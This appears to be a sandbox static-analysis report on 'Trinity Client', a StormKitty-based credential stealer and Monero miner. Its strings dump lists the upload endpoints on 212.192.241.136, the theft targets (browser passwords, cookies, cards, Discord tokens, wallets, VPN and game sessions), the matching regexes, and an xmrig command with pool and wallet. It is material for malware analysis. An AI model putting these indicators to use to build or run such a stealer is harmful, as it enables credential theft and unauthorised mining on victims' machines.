Static | ZeroBOX

PE Compile Time

2102-04-05 18:16:06 (a future date, so this header field cannot be taken as the real build time)

PDB Path

C:\Users\Test\Desktop\Trinity Botnet\Trinity Client\Trinity Client\obj\Release\Trinity Client.pdb

PE Imphash

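f34d5f2d4577ed6d9ceec516c1f5a744
(The imphash is computed from the import table, which here holds only mscoree.dll `_CorExeMain`; any executable with that same single import produces the same value, so it does not identify this sample on its own.)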

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x000190d8 0x00019200 5.84594421777
.rsrc 0x0001c000 0x000005dc 0x00000600 4.12609981814
.reloc 0x0001e000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x0001c090 0x0000034c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0001c3ec 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Y_c
Y_c
KDBM(
v4.0.30319
#Strings
__StaticArrayInitTypeSize=10
<CreateReport>b__10
CEB1CC71FC33A5B2E3A8E0727D334A0B236251779D5BAF438C965B4FB341F460
<>9__0_0
<Main>b__0_0
<>c__DisplayClass0_0
<Get>g__GetVaultElementValue|0_0
<>9__1_0
<StartMining>b__1_0
<CreateReport>b__0
28496878C202D72EEC073359CF7783F1765A4C5CDF405FA79CE14256F0D4E501
<CreateReport>b__11
2FAE78BDFE8022A734B50102E5AAAAD1BA2BB7AD72AAB6DECC21EF57D6DFE421
215470030B0DA49A7329BA30F0A38AD32EC6E7AAB0A17C2AB501FEFDD688A3D1
<CreateReport>b__1
List`1
746183F1318C28F724CFE8B949E669E523944C8C9123C416BFB2DB7832172A02
<CreateReport>b__12
3E471BEB9C4B699F9DBF2C4C30AD2DB5A2E93120A2AA6F2C4923FCC1BB456922
__StaticArrayInitTypeSize=32
Microsoft.Win32
UInt32
ReadInt32
ToInt32
5506141862EC002C0B6A1CE9E5133BEA4C9E2B0A2874B340618309782AFC7472
7FA01FA7C14EB995D3D3BEFA2652AC0FF088D5D7124283029658722E6FDD1F72
A4956ED9AA7996A00C7593BFFCBDB3FBE5A11F729876DF9AC5A1A33EF3EFE3A2
6D19E80E711937EC8EE72041A1BD75D33F4C76E03210863CD343F584F3CD07E2
<CreateReport>b__2
KeyValuePair`2
Dictionary`2
D3709EF761A0DEFC0ABE47CF9B3476718CE15F873291CF43E1AE3DC080DE5523
8B50B05A3346D82FE685DF445B7EE749C33B9BAA114363A578CEE3EDBACB7B43
D170DC7768D26A111EF0E7B910988BFC4ACBCA3BE6A5B476EED1F48C70040F93
489804EB6063B4C4D2E6D0B2D9E89A9AE050854562A681691C1A041E7B96D3C3
A8F810D24584EC3B7929D304606C2DD1E44F852CA90C291ED8CC398AA3F07FD3
<CreateReport>b__3
__StaticArrayInitTypeSize=64
ToInt64
<CreateReport>b__4
9F4785B3A7FCE2DB47B762BD03298BC60B643A91C35D994BB012774200919455
4957FD0951018A72CA86C078BC1F6B094E80D0CEF42ABDA6C07D7ED6BD14B775
<CreateReport>b__5
__StaticArrayInitTypeSize=16
ReadInt16
A981F5EDD35DDFF3F41F44A598272BBEAFA5F5B9C1595DC02FC6044CE81BE666
A515425C81DC183149AF8B446E168A9509399B54129E92DAC27E19364B0D7B86
5DE1095525AB303CB1757E42A4D855AFD36C459D66738BB6D29EC4EFDABF9EB6
064ACC46CE47C1A29B9D27B9D71B070821B627C96B594BAC77D236C37EC2CCE6
<CreateReport>b__6
CAB1D35DDB8E2426F9750F1040D87B301146E2BFAB7CF292C14EC1133A2ACB37
1B31AC76D464F22FCBDE794043D4533B09B5154FA12F2A510B042D64D7F674A7
VAULT_ITEM_WIN7
VaultGetItem_WIN7
<CreateReport>b__7
__StaticArrayInitTypeSize=38
42D76814205DCCDE199937F4024AFDD40F59A577C59AD64BBAF1511E31E09648
__StaticArrayInitTypeSize=48
00F45B18720CF90093967548198B72DB662917AB9D3BF26582BAC88BCEBABDB8
FD2AD7331099CFB7A118458E12965559ABF6D870A4B3DFF975FF43C3C56C09C8
get_UTF8
GetUTF8
VAULT_ITEM_WIN8
VaultGetItem_WIN8
<CreateReport>b__8
sNonUtf8
7D78CB380BF5EFB7B851409CA6A875F77DECF09D19B9149DA17A3EBF674BC0F9
625B1FA8EEFB9345CB2D80CDA3F78B5244D70DCB459672425C6AA7DD95FBB8F9
<CreateReport>b__9
<Module>
<PrivateImplementationDetails>
86D45C838620BD08CBFC6C4C730273D4BF33AD9593E495D84F08F858B511678A
2B38E92B45133A428979663D2C689C7151AA9D52DE967EC144A74261643F940B
A223DB41D9BFBC0280EBD0050A8BBD8EA7A943B251C8FD2D0B01A040462EDB0B
D61B7716B5AD4A42CC6C9300587B2C389EB40C3E8BF9B039E7DB98097247DC1B
143CDFB281A50A6468F7C1991D0FEDA05655ED447DACA6B3F3BCCA90446E723B
ACDF4A22C9359C1328E1CC966BC6C0D0D95B468AF46466FFAEC92C411050E17B
A25CC6D70519A408CEA3AE72EBFF915335C6E6E613B18720FA746D0D8056559B
BCRYPT_KEY_DATA_BLOB
0296D458811879A7CC04B6F85C52DEE81EE432EAD4E5765F051459B7F02CE1AC
7A769000E553478A16851DBBA454E822F03DB7C01B83809B4F5EC163F7D977BC
2758F11D171C684E6D95159D46260BE6438DAD2764618E91687E9E0AEAC641FC
8A11076CD284CF6F743D5D11778D242CBF3D91BCA53B6D43EE4DACF465E452FC
BCRYPT_KEY_DATA_BLOB_MAGIC
E0CFAA5A692BF7845AE59939493B0B96CCFFDACB3413C4CB3CD461DDE28C3D0D
0FAAA1B82B57C8DDDC82E0F99608244BE805FEF53B4B7CD47D6E398EDF3EBB7D
6C56BD00410C5FA60309B238EED42CFC1A6220172A54CD8D230165B65534A0BD
CE8979E74A40B6869BD5BED7E5610AA981486221166D6F6E65F3B34BF501B8DD
VAULT_SCHEMA_ELEMENT_ID
843991BD752E8C2C833B29AD5C915D1D94DC3F19FC14C1C8DCF720D5557A281E
BF8CAA158736480861E8F91826FFFA6545B27C3EC30153CA68330811329C2A8E
956066B197B0FDDE9C9C9D6DBCC411ECFBC0A9A012AC9BC2CD775065BB27DF9E
BCRYPT_CHAINING_MODE
4ACDF780C59C51FA1663A503E275650BA7099CACB51E54889D693D1316BF81EE
VAULT_ELEMENT_TYPE
ACDCB1AFB15194F894860BA7E2B85B91B6E5AB701407DFBAC51146F0C6E53B6F
84CDC3B9C7D6E1967A6EA1F24F2D6EEF32880F0874A2609A082EF83268D008EF
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
STATUS_AUTH_TAG_MISMATCH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
NordVPN
OpenVPN
ProtonVPN
BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO
BCRYPT_OAEP_PADDING_INFO
BCRYPT_PSS_PADDING_INFO
System.IO
BCRYPT_PAD_OAEP
GetPublicIP
GetLocalIP
SendARP
MS_PRIMITIVE_PROVIDER
ERROR_SUCCESS
UnLoadNSS
BCRYPT_PAD_PSS
BCRYPT_KEY_LENGTHS_STRUCT
BattleNET
VAULT_ITEM_ELEMENT
set_IV
value__
FileZilla
cbData
sWebData
pbData
DownloadData
ProtectedData
bEncryptedData
cbAuthData
pbAuthData
SECItemData
ScanData
sLoginData
tsData
CryptUnprotectData
GetTdata
lappdata
CopyLevelDb
mscorlib
DataBlob
github
System.Collections.Generic
get_sExpiresUtc
set_sExpiresUtc
SchemaId
schemaId
baseId
pszAlgId
diskId
videoId
biosId
SchemaElementId
get_CurrentThread
RijndaelManaged
LastModified
failed
Undefined
detected
bytesToBeDecrypted
encrypted
pReserved
System.Collections.Specialized
pPackageSid
vaultGuid
<sExpiresUtc>k__BackingField
<sPassword>k__BackingField
<sTitle>k__BackingField
<sName>k__BackingField
<sUsername>k__BackingField
<sIsSecure>k__BackingField
<sValue>k__BackingField
<sPath>k__BackingField
<sExpMonth>k__BackingField
<sUrl>k__BackingField
<sExpYear>k__BackingField
<sNumber>k__BackingField
<sBrowser>k__BackingField
<iCount>k__BackingField
<sKey>k__BackingField
<sHostKey>k__BackingField
RecordHeaderField
GetField
TrimEnd
ReadToEnd
AppEnd
method
FormatCreditCard
WriteDiscord
pPassword
get_sPassword
set_sPassword
FormatPassword
DecryptPassword
password
Replace
Service
IdentityReference
cbNonce
pbNonce
Resource
set_Mode
chainingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
Decode
get_Unicode
get_BigEndianUnicode
Base64Encode
VaultFree
FromImage
Stealer.Edge
cCookie
sCookie
FormatCookie
EndInvoke
BeginInvoke
ReadTable
ReadMasterTable
IDisposable
ToDouble
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
vaultHandle
Rectangle
Single
UploadFile
CopyDatabaseFile
ZipFile
logfile
sProfile
GetProfile
SetProfile
profile
Console
get_sTitle
set_sTitle
DetectTitle
GetActiveWindowTitle
hModule
set_WindowStyle
ProcessWindowStyle
GetCPUName
GetGPUName
get_Name
sProcName
get_StandardName
tableName
set_FileName
GetTempFileName
sFileName
GetFileName
fileName
get_MachineName
valueName
GetElementsByTagName
get_EnglishName
get_FullName
ItemName
GetWindowsVersionName
BrowserPathToAppName
get_UserName
get_sName
set_sName
sWalletName
GetHostName
pszCredentialFriendlyName
fnGetFriendlyName
GetDirectoryName
compname
get_sUsername
set_sUsername
username
hostname
DateTime
GetCreationTime
ReadLine
AppendLine
WriteLine
Combine
LocalMachine
get_CurrentTimeZone
localZone
DataProtectionScope
pszBlobType
DetectCreditCardType
ValueType
SECItemType
GetType
Compare
get_sIsSecure
set_sIsSecure
PtrToStructure
get_CurrentCulture
culture
Capture
ToTitleCase
database
Dispose
Truncate
MulticastDelegate
hashrate
TokenState
RecursiveDelete
SQLite
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
UnmanagedFunctionPointerAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
ParamArrayAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
hMozGlue
GetBValue
GetIValue
GetLValue
GetSValue
get_Value
AppendValue
get_sValue
set_sValue
GetValue
DecryptValue
wmiMustBeTrue
get_IsAlive
SystemDrive
Remove
Trinity Client.exe
get_Size
cbSize
_pageSize
_sqlDataTypeSize
MaxAuthTagSize
get_BlockSize
set_BlockSize
chunkSize
get_KeySize
set_KeySize
Resize
SizeOf
get_ItemOf
IndexOf
authTag
GetFlag
get_Jpeg
DecryptConfig
System.Threading
ASCIIEncoding
_dbEncoding
System.Drawing.Imaging
Logging
Banking
StartMining
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
RandomString
ToString
HKLM_GetString
GetHexString
Substring
System.Drawing
ConvertToULong
IsMatch
ComputeHash
GetHash
GetCookiesDBPath
GetBookmarksDBPath
GetHistoryDBPath
MozillaPath
EdgePath
SkypePath
sSavePath
PidginPath
GetTempPath
CopyTempPath
GetFolderPath
sPrevBrowserPath
get_sPath
set_sPath
MinecraftPath
GetPswPath
get_Width
get_Length
dwMinLength
dwMaxLength
maxLength
length
EndsWith
StartsWith
get_sExpMonth
set_sExpMonth
VaultCli
PtrToStringUni
WinApi
AsyncCallback
callback
Facebook
GrabOutlook
bBookmark
FormatBookmark
AllocHGlobal
FreeHGlobal
Illegal
Marshal
System.Security.Principal
Paypal
cbLabel
pbLabel
SaveAll
kernel32.dll
user32.dll
crypt32.dll
vaultcli.dll
iphlpapi.dll
bcrypt.dll
MainWriteAutoFill
FormatAutoFill
Autofill
System.Xml
get_sUrl
set_sUrl
get_EndOfStream
CryptoStream
MemoryStream
Telegram
cAesGcm
TSECItem
get_Item
VaultGetItem
vaultItem
OperatingSystem
SymmetricAlgorithm
phAlgorithm
HashAlgorithm
Random
random
ICryptoTransform
RootNum
rowNum
Stealer.Chromium
toscan
Boolean
SECItemLen
physicalAddrLen
CopyFromScreen
get_PrimaryScreen
Pidgin
MessageBoxIcon
get_CurrentRegion
GetExtension
GetFileNameWithoutExtension
get_OSVersion
get_Version
GetSystemVersion
dwInfoVersion
GetBitVersion
GetBattleNETSession
GetSteamSession
GetSession
GetUplaySession
application
SystemInformation
pszImplementation
System.Globalization
System.Reflection
NameValueCollection
MatchCollection
GroupCollection
WebHeaderCollection
ManagementObjectCollection
CallingConvention
SearchOption
CryptographicException
IndexOutOfRangeException
UriFormatException
pszDescription
StringComparison
fpNssShutdown
CopyTo
CopyWalletFromDirectoryTo
CopyWalletFromRegistryTo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
SendSystemInfo
FileSystemInfo
RegionInfo
set_StartInfo
ProcessStartInfo
get_TextInfo
DirectoryInfo
Crypto
destIp
Bitmap
Ionic.Zip
TimeStamp
hwndApp
get_sExpYear
set_sExpYear
ToChar
macAddr
get_sNumber
set_sNumber
number
XmlReader
SqlReader
StreamReader
XmlTextReader
MD5CryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
provider
StringBuilder
sourceFolder
sLocalStateFolder
SpecialFolder
destFolder
Buffer
Filemanager
ManagementObjectSearcher
bCipher
SecurityIdentifier
identifier
Stealer
CommandHelper
ToUpper
Stealer.InternetExplorer
CurrentUser
Parser
get_sBrowser
set_sBrowser
GetDelegateForFunctionPointer
Counter
BitConverter
ToLower
sSaveDir
InitWorkDir
sWalletDir
get_Major
set_ForegroundColor
ConsoleColor
ResetColor
get_Minor
set_RedirectStandardError
Authenticator
separator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
CreateDecryptor
passwordVaultPtr
ReadIntPtr
vaultElementPtr
Graphics
ScreenMetrics
System.Diagnostics
threads
MainWriteDownloads
get_Bounds
GetBounds
SaveMods
MainWriteCreditCards
cPasswords
MainWritePasswords
pPasswords
DetectedBankingServices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DetectServices
GetInstances
GrabberSourceCodes
DebuggingModes
get_ChildNodes
GrabberImages
Matches
cCookies
MainWriteCookies
DiscordDirectories
sWalletsDirectories
GetDirectories
_masterTableEntries
_tableEntries
GetDBFiles
CopyRequiredFiles
requiredFiles
SaveFiles
GetFiles
keyFiles
_fieldNames
GetSubKeyNames
CreditCardTypes
shares
GrabberDatabases
_fileBytes
Rfc2898DeriveBytes
ReadAllBytes
WriteAllBytes
GetBytes
saltBytes
dwPromptFlags
dwFlags
SendLogs
GetLogs
sGeckoBrowserPaths
sChromiumPswPaths
bBookmarks
cBookmarks
MainWriteBookmarks
sBookmarks
SavedWifiNetworks
Equals
cBrowserUtils
aFills
VaultEnumerateItems
System.Windows.Forms
lcDicordTokens
GetTokens
domains
Contains
cLogins
SaveVersions
GetTelegramSessions
System.Text.RegularExpressions
System.Collections
StringSplitOptions
RegexOptions
MessageBoxButtons
get_Groups
InvalidChars
GetInvalidPathChars
get_Headers
RuntimeHelpers
ResetCounters
sEncPass
wmiClass
ManagementClass
get_Success
success
Process
IPAddress
GetProcAddress
System.Net.Sockets
GetWallets
VaultEnumerateVaults
clients
pPropertyElements
GrabberDocuments
set_Arguments
GetAccounts
SaveScreenshots
get_Exists
FTPHosts
GetAntivirus
get_BatteryChargeStatus
get_PowerStatus
arrays
Concat
ImageFormat
ManagementBaseObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
object
ondetect
Unprotect
CryptprotectPromptstruct
System.Net
ReadTableFromOffset
offset
Minecraft
get_Height
op_Explicit
fpNssInit
WaitForExit
cbSalt
VaultCloseVault
VaultOpenVault
get_Default
pcbResult
IAsyncResult
DialogResult
tsResult
result
UnsignedInt
StormKitty.Implant
Important
get_BatteryLifePercent
Trinity Client
Trinity_Client
WebClient
mailClient
smptClient
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
get_DocumentElement
pIdentityElement
dwIncrement
SqlStatement
Environment
XmlDocument
get_Parent
GetParent
get_Current
iContent
FingerPrint
fingerPrint
get_Count
get_iCount
set_iCount
vaultItemCount
dwPropertiesCount
vaultCount
GetRowCount
GetRamAmount
SendScreenshot
WebcamScreenshot
DesktopScreenshot
GetPathRoot
pPrompt
szPrompt
cBCrypt
StringsCrypt
DPAPIDecrypt
fpPk11SdrDecrypt
BCryptDecrypt
EasyDecrypt
BCryptEncrypt
ThreadStart
TrimStart
AppStart
Convert
UnsignedShort
CreateReport
RemoveLatest
XmlNodeList
get_AddressList
get_Host
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
ReadAllText
AppendAllText
WriteAllText
pPlainText
plainText
pCipherText
cipherText
get_InnerText
GetWindowText
cbMacContext
pbMacContext
get_Now
GetForegroundWindow
set_CreateNoWindow
datenow
endIdx
startIdx
startIndex
FFRegex
TokenRegex
MessageBox
Stealer.Firefox
ProtectedArray
ByteArray
InitializeArray
ToArray
get_Key
set_Key
OpenSubKey
DecryptWithKey
bMasterKey
GetMasterKey
sPrevMasterKey
get_sKey
set_sKey
ContainsKey
ProductKey
cryptKey
hImportKey
BCryptImportKey
get_sHostKey
set_sHostKey
BCryptDestroyKey
RegistryKey
System.Security.Cryptography
get_AddressFamily
BlockCopy
bEntropy
pEntropy
LoadLibrary
FreeLibrary
GetBattery
Recovery
get_Directory
AddDirectory
PasswordsStoreDirectory
CreateDirectory
sDirectory
SetCurrentDirectory
CopyDirectory
cHistory
MainWriteHistory
sHistory
FormatHistory
TableEntry
ZipEntry
SqliteMasterEntry
IPHostEntry
GetHostEntry
localCountry
GetCountry
GetInfoFromRegistry
sWalletsRegistry
sWalletRegistry
op_Equality
op_Inequality
Trinity
System.Security
Identity
IsNullOrEmpty
wmiProperty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
StormKitty
WrapNonExceptionThrows
Trinity Client
Copyright
2021
$40a95495-ac33-41dc-a7f9-1102304089ba
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
C:\Users\Test\Desktop\Trinity Botnet\Trinity Client\Trinity Client\obj\Release\Trinity Client.pdb
_CorExeMain
mscoree.dll
'\e(8iY
mhttps://github.com/LimerBoy/StormKitty
L[a2/A?
^B09SH
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
N&O&P&Q&R&S*T*U*V*W/X7Y7ZD[D\D]D^D_D
Started Threads.
Getting System Info.
SCREEN
ACTIVE
Region
COUNTRY
HASHRATE
THREADS
SHARES
http://212.192.241.136/trinity%20server/main_api.php
Uploaded System Info.
C:\ProgramData\
http://212.192.241.136/trinity%20server/screen_api.php
Uploaded Screenshot.
SOFTHWID
change
PASSWORDS
COOKIES
http://212.192.241.136/trinity%20server/stealer_api.php
Uploaded Passwords.
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Microsoft
Microsoft
root\CIMV2
SELECT * FROM Win32_Processor
Unknown
SELECT * FROM Win32_VideoController
Select * From Win32_ComputerSystem
TotalPhysicalMemory
Not Found
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Not installed
http://ip-api.com/json/?fields=status,country,countryCode
yyyy-MM-dd h:mm:ss tt
BASE >>
DISK >>
VIDEO >>
Win32_Processor
UniqueId
ProcessorId
Manufacturer
MaxClockSpeed
Win32_BIOS
SMBIOSBIOSVersion
IdentificationCode
SerialNumber
ReleaseDate
Version
Win32_DiskDrive
Signature
TotalHeads
Win32_BaseBoard
Win32_VideoController
DriverVersion
Win32_NetworkAdapterConfiguration
MACAddress
IPEnabled
google
yandex
duckduckgo
wallet
exchange
paypal
coinbase
blockchain
credit
shcwab
creditunion
federal
savings
capital
central
century
citizens
commercial
community
farmers
franklin
heritage
liberty
merchants
metropolitan
mutual
national
pacific
peoples
premier
progress
republic
security
united
valley
washington
western
facebook
twitter
telegram
discord
protonmail
outlook
hotmail
Amex Card
^3[47][0-9]{13}$
BCGlobal
^(6541|6556)[0-9]{12}$
Carte Blanche Card
^389[0-9]{11}$
Diners Club Card
^3(?:0[0-5]|[68][0-9])[0-9]{11}$
Discover Card
6(?:011|5[0-9]{2})[0-9]{12}$
Insta Payment Card
^63[7-9][0-9]{13}$
JCB Card
^(?:2131|1800|35\\d{3})\\d{11}$
KoreanLocalCard
^9[0-9]{15}$
Laser Card
^(6304|6706|6709|6771)[0-9]{12,15}$
Maestro Card
^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
Mastercard
5[1-5][0-9]{14}$
Solo Card
^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
Switch Card
^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
Union Pay Card
^(62[0-9]{14,17})$
Visa Card
4[0-9]{12}(?:[0-9]{3})?$
Visa Master Card
^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
Express Card
3[47][0-9]{13}$
(No data)
Report created
Failed to create report, error:
UNIQUE
Stealer >> Failed recursive remove directory with passwords
Url: {0}
User: {1}
Password: {2}
Type: {0}
Number: {1}
Exp: {2}
Holder: {3}
HostKey: {0}
Path: {1}
(UTC)Expires: {2}
Name: {3}
Value: {4}
Name: {0}
Value: {1}
URL: {0}
Title: {1}
Visits: {2}
Title: {0}
URL: {1}
Title: {0}
\Passwords.txt
\Credit Cards.txt
\Bookmarks.txt
\History.txt
\Cookies.txt
\AutoFill.txt
\Downloads.txt
BCrypt.BCryptDecrypt() (get size) failed with status code: {0}
BCrypt.BCryptDecrypt(): authentication tag mismatch
BCrypt.BCryptDecrypt() failed with status code:{0}
BCrypt.BCryptOpenAlgorithmProvider() failed with status code:{0}
BCrypt.BCryptSetAlgorithmProperty(BCrypt.BCRYPT_CHAINING_MODE, BCrypt.BCRYPT_CHAIN_MODE_GCM) failed with status code:{0}
BCrypt.BCryptImportKey() failed with status code:{0}
BCrypt.BCryptGetProperty() (get size) failed with status code:{0}
BCrypt.BCryptGetProperty() failed with status code:{0}
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
\FileZilla\
recentservers.xml
sitemanager.xml
Server
ftp://
Filezilla >> Failed collect passwords
Url: {0}
Username: {1}
Password: {2}
\Hosts.txt
BattleNET >> Session not found
*.config
Battle.net
BattleNET >> Failed copy file
BattleNET >> Error
versions
\versions.txt
VERSION:
DATE:
bytes
\mods.txt
SIZE:
screenshots
\screenshots
\screenshots\
profile
options
servers
.minecraft
Software\Valve\Steam
SteamPath
Installed
Running
Updating
\Apps.txt
Application
GameID:
Installed:
Running:
Updating:
Steam >> Failed collect steam apps
\ssnf\
Steam >> Failed collect steam .ssnf files
config
\configs
\configs\
Steam >> Failed collect steam configs
RememberPassword
Autologin User:
AutoLoginUser
Remember password:
\SteamInfo.txt
Steam >> Failed collect steam info
Uplay >> Session not found
Uplay >> Error
Ubisoft Game Launcher
\tokens.txt
Authorization
Unauthorized
Token is valid
Token is invalid
Connection error
[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
Discord\Local Storage\leveldb
Discord PTB\Local Storage\leveldb
Discord Canary\leveldb
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
SMTP Email Address
SMTP Server
POP3 Server
POP3 User Name
SMTP User Name
NNTP Email Address
NNTP User Name
NNTP Server
IMAP Server
IMAP User Name
HTTP User
HTTP Server URL
POP3 User
IMAP User
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
\Outlook.txt
Password
{0}: {1}
^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
^(?!:\/\/)([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
\chatlogs
Pidgin >> Failed to collect chat logs
accounts.xml
Protocol:
Username:
Password:
\accounts.txt
Pidgin >> Failed to collect accounts
.purple
Local Storage
\Local Storage
Microsoft\Skype for Desktop
\Telegram Desktop\tdata
usertag
settings
key_data
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Password:
OpenVPN Connect\profiles
\profiles
profiles\
ProtonVPN
ProtonVPN.exe
\user.config
Wallets >> Failed collect wallets
Software
strDataDir
\wallets
Wallets >> Failed collect wallet from registry
\Zcash
Armory
\Armory
Bytecoin
\bytecoin
\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Exodus
\Exodus\exodus.wallet
Ethereum
\Ethereum\keystore
Electrum
\Electrum\wallets
AtomicWallet
\atomic\Local Storage\leveldb
Guarda
\Guarda\Local Storage\leveldb
Coinomi
\Coinomi\Coinomi\wallets
Litecoin
Bitcoin
\InternetExplorer
\InternetExplorer\Passwords.txt
Internet Explorer >> Failed to get passwords
[ERROR] Unable to enumerate vaults. Error (0x
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
\Profiles
\places.sqlite
Firefox >> Failed to find bookmarks
moz_bookmarks
Firefox >> bookmarks collection failed
\cookies.sqlite
moz_cookies
Firefox >> cookies collection failed
\mozglue.dll
\nss3.dll
NSS_Init
PK11SDR_Decrypt
NSS_Shutdown
Firefox decryptor >> Failed to load NSS
\Profiles\
Firefox >> Failed to recover data
Firefox >> Failed to find history
moz_places
Firefox >> history collection failed
Firefox >> Failed to copy logins
logins.json
key3.db
key4.db
\logins.json
Firefox >> Failed to find profile
Firefox >> Failed to copy files to decrypt passwords
,"logins":\[
,"potentiallyVulnerablePasswords"
Firefox >> Failed collect passwords
Program Files\Mozilla Firefox
Users\Public
cert9.db
autofill
Edge >> Failed collect autofill
"bookmark_bar": {
"other": {
"name": "
"type": "url",
"url": "http
Failed to parse url
Edge >> Failed collect bookmarks
credit_cards
Edge >> Failed collect credit cards
\Login Data
\Web Data
\Bookmarks
\Cookies
\History
\CreditCards.txt
Chromium >> Failed collect autofill data
Chromium >> Failed collect bookmarks data
\Opera Stable\Local State
\Local State
"encrypted_key":"(.*?)"
Opera Software
cookies
Chromium >> Failed collect cookies
Chromium >> Failed collect credit cards
downloads
Chromium >> Failed collect downloads
Chromium >> Failed collect history
logins
Chromium >> Failed collect passwords
cmd.exe
StormKitty-Latest.log
Unknown System
SELECT * FROM win32_operatingsystem
HARDWARE\Description\System\CentralProcessor\0
Identifier
(32 Bit)
(64 Bit)
(Unknown)
No network adapters with an IPv4 address in the system!
SystemInfo >> GetPublicIP : Request error
Request failed
CRYPTED:
This application was unable to start correctly (0xc0000007b).
Click OK to close the application.
Application Error
WinRing0x64.sys
http://127.0.0.1/WinRing0x64.sys
xmrig.exe
http://127.0.0.1/xmrig.exe
--print-time 15 -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
accepted
completed jobs
READY threads
threads
speed 10s/60s/15m
\Browsers
\Messenger\Discord
\Messenger\Pidgin
\Messenger\Outlook
\Messenger\Skype
\Messenger\Telegram
\Gaming\Steam
\Gaming\Uplay
\Gaming\Battle.NET
\Gaming\Minecraft
\Crypto Wallets
\FileZilla
\VPN\ProtonVPN
\VPN\OpenVPN
\VPN\NordVPN
"hostname":"([^"]+)"
"encryptedUsername":"([^"]+)"
"encryptedPassword":"([^"]+)"
VS_VERSION_INFO
VarFileInfo
Translation
